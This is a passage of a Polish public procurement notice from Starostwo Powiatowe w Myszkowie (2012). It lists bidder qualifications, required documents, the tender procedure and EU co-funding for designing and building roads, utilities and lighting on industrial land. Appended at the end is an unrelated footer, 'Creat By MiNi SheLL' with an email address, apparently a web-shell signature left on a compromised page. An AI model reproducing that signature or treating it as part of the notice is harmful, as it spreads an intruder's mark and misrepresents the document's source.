                   projektów budowlanych dotyczących zagospodarowania terenów     przemysłowych o powierzchni opracowania minimum  20 ha  obejmujących swym zakresem :                                                                      
                    - drogi z odwodnieniem o powierzchni min. 7000 m2 ;
                  - chodniki o powierzchni  min. 2000 m2 ;
               - sieci zewnętrzne wodne o długości min. 1000 mb każda;
               - sieci zewnętrzne kanalizacyjne  o długości min. 1000 mb każda;
                 - oświetlenie dróg na słupach wraz z zasilaniem elektroenergetycznym o długości    min.800 mb (z podaniem opisu prac, dat wykonania oraz odbiorcy wraz z załączeniem dokumentów potwierdzających,  że zostały wykonane należycie).


b.2) w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zgodnie z zasadami sztuki budowlanej wykonali i prawidłowo ukończyli co najmniej 2 prace, z których każda polegała na wykonaniu:
                   robót budowlanych obejmujących swym zakresem :                                                                      
                     - drogi z odwodnieniem o powierzchni min. 7000 m2 ;
                   - chodniki o powierzchni  min. 2000 m2 ;
                 - sieci zewnętrzne wodne o długości min. 1000 mb każda;
                 - sieci zewnętrzne kanalizacyjne  o długości min. 1000 mb każda;
                   - oświetlenie dróg na słupach wraz z zasilaniem elektroenergetycznym o długości     min.800 mb (z podaniem opisu prac, dat wykonania oraz odbiorcy wraz z załączeniem dokumentów potwierdzających,  że zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone)
  
	Zamawiający dopuszcza wykonanie ww. zakresów prac (b.1+b.2) w ramach jednej umowy lub w osobnych umowach.

W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, wyżej wymieniony warunek musi być spełniony przez Wykonawców łącznie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują osobami, które będą wykonywać zamówienie lub pisemnym zobowiązaniem innych podmiotów do udostępnienia tych osób,  w tym: 
                 c.1) przynajmniej 2 osobami posiadającymi uprawnienia bez ograniczeń do projektowania o specjalności:  
o	architektonicznej
o	drogowej, 
o	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych,  wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, 
o	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych



Warunek uznaje się za spełniony jeżeli Wykonawca przedstawi co najmniej dwie osoby posiadające wszystkie wymienione uprawnienia lub kilka osób posiadających jedno lub kilka z wymienionych uprawnień, osoby te łącznie powinny dysponować wszystkimi wymaganymi w specyfikacji uprawnieniami.  



c.2) przynajmniej 1 osobą posiadającą uprawnienia bez ograniczeń do kierowania robotami budowlanymi  o specjalności:  
o	drogowej, 
o	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych,  wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, 
o	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych

Warunek uznaje się za spełniony jeżeli Wykonawca przedstawi co najmniej jedną osobę posiadającą wszystkie wymienione uprawnienia lub kilka osób posiadających jedno lub kilka z wymienionych uprawnień, osoby te łącznie powinny dysponować wszystkimi wymaganymi w specyfikacji uprawnieniami.  

W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, wyżej wymieniony warunek (c.1 + c.2) musi być spełniony przez Wykonawców łącznie.

Do wykazu należy dołączyć oświadczenie (załącznik nr 7 do SIWZ), że osoby które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadanie środków finansowych lub zdolności kredytowej o łącznej kwocie w wysokości co najmniej 5.000.000,00 zł.

W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, wyżej wymieniony warunek musi być spełniony przez Wykonawców łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta winna zawierać wypełniony formularz Oferta-  Załącznik nr 1 do SIWZ. W przypadku podpisywania oferty lub poświadczania za zgodność z oryginałem kopii dokumentów przez osobę/y nie wymienioną/e w dokumencie rejestracyjnym (ewidencyjnym) wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo. Pełnomocnictwo powinno być przedstawione w formie oryginału. 2.1 Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w ust. 2, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - wystawione odpowiednio nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (dla dokumentu wskazanego w ust. 2 lit. a SIWZ) i nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (dla dokumentu wskazanego w ust. 2 lit. b SIWZ).
3.  Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp - określonych w Cz. 8 ust. 1 pkt 1) lit. b.1) oraz lit. b.2)  SIWZ,  a także określonych w Cz. 8 ust. 1 pkt 1) lit. c.1) oraz lit. c.2) SIWZ - polega na zasobach innych podmiotów, na zasadach określonych w art. 26 ust. 2b ustawy Pzp, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Wzór zobowiązania stanowi załącznik nr 8 do SIWZ.
4.  Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp określonych w Cz.8 ust. 1 pkt 1) lit. b.1) oraz lit. b.2) SIWZ, a także określonych w Cz. 8 ust. 1 pkt 1) lit. c.1) oraz lit. c.2)	 SIWZ - polega na zasobach innych podmiotów, na zasadach określonych w art. 26 ust. 2b ustawy Pzp, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w Cz. 9 ust. 1 pkt 2)- 5) SIWZ. Postanowienia dotyczące podmiotów, które mają siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej stosuje się odpowiednio.
5. Zgodnie z art. 26 ust. 2c  ustawy Pzp Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku. Zgodnie z § 1 ust. 3 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane, jeżeli wykonawca wykazując spełnianie warunku, o którym mowa w Cz. 8 ust. 1 pkt 1) lit. d) SIWZ, polega na zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, wymaga się przedłożenia informacji, o której mowa w Cz. 9 ust. 1 pkt 10) dotyczącej tych podmiotów. 
6. W przypadku złożenia oferty przez Wykonawców wspólnie ubiegających się o zamówienie do oferty należy dołączyć pełnomocnictwo ustanawiające pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem konsorcjum. 
7. W przypadku złożenia oferty przez spółkę cywilną do oferty należy dołączyć odpowiednie pełnomocnictwo(a) udzielone przez wszystkich wspólników dla jednego ze wspólników lub dla osoby trzeciej, upoważniające osobę umocowaną do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Jeżeli upoważnienie do złożenia oferty wspólnej wynika np. z umowy spółki cywilnej, to do oferty zamiast pełnomocnictwa można załączyć tę umowę (oryginał) lub  jej kopię poświadczoną za zgodność z oryginałem przez wszystkich wspólników. 
8. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz 
w przypadku podmiotów, o których mowa w ust. 3 i 4 kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem przez Wykonawcę lub te podmioty.

9. Dokumenty powinny być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub osoby uprawnione do reprezentowania Wykonawcy.
10. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
11. Wszystkie wymagane dokumenty powinny być sporządzone w języku polskim, na maszynie,    komputerze lub odręcznie w sposób zapewniający czytelność tekstu.
12. Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę. 
13. W zakresie nie uregulowanym niniejszą SIWZ mają zastosowanie przepisy rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2009 r. Nr 226, poz.1817).

Cz.10.   Wykonawcy wspólnie ubiegający się o zamówienie:
1)	ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania określoną w art. 366 kodeksu cywilnego;
2)	zobowiązani są ustanowić Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia; 
3)	pełnomocnictwo musi wynikać z umowy lub z innej czynności prawnej, mieć formę pisemną; fakt ustanowienia Pełnomocnika musi wynikać z załączonych do oferty dokumentów;
4)	pełnomocnictwo składa się w oryginale lub kopi poświadczonej za zgodność z oryginałem 
5)	jeżeli oferta Wykonawców wspólnie ubiegających się o zamówienie zostanie wybrana jako najkorzystniejsza, Zamawiający żąda przed zawarciem umowy  przedstawienia w określonym terminie umowy regulującej współpracę tych Wykonawców.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>18.4 Zamawiający dopuszcza możliwość wprowadzenia zmiany do umowy w stosunku 
do treści oferty w zakresie:

18.4.1 Zmiany  terminu wykonania umowy w sytuacjach, gdy :
a) realizowane będą roboty zamienne w znacznych rozmiarach  niezbędne do prawidłowego wykonania  i zakończenia robót objętych umową podstawową,
b) zaszły okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, pomimo zachowania należytej staranności, za które Wykonawca nie ponosi odpowiedzialności a w szczególności w przypadku działania siły wyższej (w szczególności klęski żywiołowe, warunki atmosferyczne odbiegające od typowych, uniemożliwiające prowadzenie robót budowlanych).
 c) wystąpią nieprzewidziane w SIWZ warunki geologiczne, archeologiczne lub terenowe i inne tego typu.
     Zmiana terminu wykonania umowy jest możliwa pod warunkiem uzyskania zgody przez Instytucję Zarządzającą Regionalnego Programu Operacyjnego Województwa Śląskiego.
18.4.2  Zmian powszechnie obowiązujących przepisów prawa mających wpływ na realizację przedmiotu zamówienia, w tym zmiany stawki VAT.
18.4.3 Terminów płatności za wykonane zakresy robót określonych umową w przypadku zaistnienia okoliczności, których Zamawiający nie mógł przewidzieć.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.powiatmyszkowski.bip.net.pl/?c=207<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Myszkowie, ul. Pułaskiego 6, 42-300 Myszków, pokój nr 308 (III piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.11.2012 godzina 10:00, miejsce: Starostwo Powiatowe w Myszkowie, 42-300 Myszków, ul. Pułaskiego 6, Biuro Podawcze na Sali Obsługi Interesantów (parter) stanowisko nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013, Priorytet  6   Zrównoważony Rozwój Miast, Działanie  6.2. Rewitalizacja obszarów zdegradowanych, Poddziałanie 6.2.2 Rewitalizacja - małe miasta..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com